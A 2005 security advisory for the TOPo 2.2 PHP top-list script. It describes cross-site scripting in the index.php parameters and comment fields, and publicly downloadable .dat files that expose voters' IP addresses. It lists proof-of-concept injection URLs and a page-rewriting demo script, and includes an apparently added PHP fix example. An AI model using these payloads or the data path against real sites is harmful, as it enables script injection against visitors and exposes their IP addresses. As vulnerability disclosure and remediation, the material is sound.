#######################################################
TOPo 2.2 multiple variable & fields XSS and information disclosure
vendor url: http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
advisory: http://lostmon.blogspot.com/2005/05/topo-22-multiple-variable-fields-xss.html
vendor notified: yes
exploit available: yes
#######################################################

TOPo is a free TOP system written in PHP that works without a MySQL database. TOPo is specially designed for web sites hosted on web servers that do not offer quality MySQL support.

TOPo contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate the 'm', 's', 'ID', 't' and possibly other parameters upon submission to the 'index.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

TOPo also contains a flaw that allows remote users to obtain information. All data are stored in the '/data/' folder, and the *.dat files there hold all votes, comments and other information about the sites on the top list. Any user can download these files and obtain the IP address of every client who voted or added a comment.

################
software used:
################
Microsoft Windows 2000 [Version 5.00.2195] all fixes.
Internet Explorer 6.0 SP1 all fixes.
Netcraft toolbar 1.5.6 (detects all attacks, XSS in this case :D)
Google toolbar 2.0.114.9-big/es

###########
versions:
###########
TOPo v2.2.178 vulnerable.

##############
solution
##############
No solution was available at this time.
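Since the advisory lists no fix, here is an added example (not TOPo's code and not a vendor patch) of how index.php could handle the parameters the advisory names. It whitelists the keyword parameters m, s and t, validates ID against the numeric shape seen in the PoC URLs, and encodes the comment-form fields (name, web, email) on output. The allowed-value lists and the function names are assumptions; TOPo's real modules and sections may differ.

```php
<?php
// Added example, not TOPo's own code. Parameter and field names come from the
// advisory; the allowed literals below are assumed from the PoC URLs.

const ALLOWED_M = ['top', 'members'];              // assumed module names
const ALLOWED_S = ['info', 'html'];                // assumed section names
const ALLOWED_T = ['puntuar', 'comments', 'edit']; // assumed action names

// Return $params[$key] only if it is one of the allowed literals, else the default.
function pickAllowed(array $params, string $key, array $allowed, string $default): string
{
    $value = $params[$key] ?? $default;
    return in_array($value, $allowed, true) ? $value : $default;
}

// IDs in the advisory look like 1115946293.3552 (digits, dot, digits);
// anything else is rejected rather than reflected back into the page.
function validId(?string $id): ?string
{
    if ($id === null || preg_match('/^\d{1,12}\.\d{1,6}$/', $id) !== 1) {
        return null;
    }
    return $id;
}

// Output encoding for anything placed inside HTML text or an attribute value.
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// The vulnerable pattern the advisory describes: request input copied into markup as-is.
function linkUnsafe(array $get): string
{
    return '<a href="index.php?m=' . $get['m'] . '&s=' . $get['s'] . '&ID=' . $get['ID'] . '">vote</a>';
}

// Hardened version: whitelist m/s/t, validate ID, and still encode every value on output.
function linkSafe(array $get): string
{
    $m  = pickAllowed($get, 'm', ALLOWED_M, 'top');
    $s  = pickAllowed($get, 's', ALLOWED_S, 'info');
    $t  = pickAllowed($get, 't', ALLOWED_T, 'comments');
    $id = validId($get['ID'] ?? null);
    if ($id === null) {
        http_response_code(400);
        return 'invalid ID';
    }
    return '<a href="index.php?m=' . h($m) . '&amp;s=' . h($s)
         . '&amp;ID=' . h($id) . '&amp;t=' . h($t) . '">vote</a>';
}

// Comment form: the free-text fields cannot be whitelisted, so they are
// encoded when rendered. Field names are the ones the advisory lists.
function renderComment(array $post): string
{
    $name  = h($post['name'] ?? '');
    $web   = h($post['web'] ?? '');
    $email = h($post['email'] ?? '');
    return "<p>$name &lt;$email&gt; ($web)</p>";
}

// Constructed request mirroring the PoC: a closing quote and angle bracket in m=.
$probe = ['m' => 'top">', 's' => 'info', 'ID' => '1114815037.2498'];
echo linkUnsafe($probe), "\n"; // the injected characters pass straight through into the attribute
echo linkSafe($probe), "\n";   // m falls back to "top" and every value is entity-encoded
echo renderComment(['name' => '<b>x</b>', 'web' => 'http://example.invalid', 'email' => 'a@b']), "\n";
```

For the second flaw, the .dat files under /data/ should not be reachable over HTTP at all: keep them outside the document root, or deny web access to that directory in the server configuration, so that the vote and comment records (and the client IP addresses in them) are only readable by the PHP code itself.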
############
time line
############
discovered: 13 may 2005
vendor notify: 19 may 2005
vendor response:
vendor fix:
disclosure: 20 may 2005

######################
Proof of concepts XSS
######################
http://[victim]/topo/index.php?m=top"> &s=info&ID=1114815037.2498
http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552 "> &t=puntuar
http://[victim]/topo/index.php?m=top&s=info"> &ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top"> &s=info&ID=1115946293.3552&t=puntuar
http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=1114815037.2498">
http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1&ID=1111068112.7598">
http://[victim]/topo/index.php?m=members&s=html&t=edit">

#########################
When trying to add a new comment, some fields are vulnerable to XSS-style attacks.
http://[victim]/top/index.php?m=top&s=info&t=comments&paso=1&ID=1115946293.3552
The 'name' field, the 'your web' field and the 'your email' field are vulnerable.

##################
example of js.js
##################
Thnx to http://www.drorshalev.com for this script and for hosting it for this demonstration.

#################
js.js
#################
function showIt(){
  // The HTML markup that wrapped this message was lost when the advisory was
  // extracted; only the text and the string concatenation survive.
  document.body.innerHTML = "Your PC Can be hacked Via " + document.domain +
    " XSS ,Html Injection to a Web Site " + document.domain + " By DrorShalev.com" +
    document.body.innerHTML;
  window.status = "Your PC Can be hacked Via " + document.domain +
    " XSS ,Html Injection to a Web Site " + document.domain + " By DrorShalev.com";
  setTimeout("window.open('view-source:http://sec.drorshalev.com/dev/injection/xss.txt')", 6000);
}
setTimeout("showIt()", 2000);

################
data disclosure
################
http://[victim]/data/

################
EnD
#####################
thnx to Estrella for being my light
thnx to all the http://www.osvdb.org Team
Thnx to http://www.drorshalev.com and Dror for his script and for hosting it !!!!
thnx to all who day after day support me !!!
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what makes the mind move....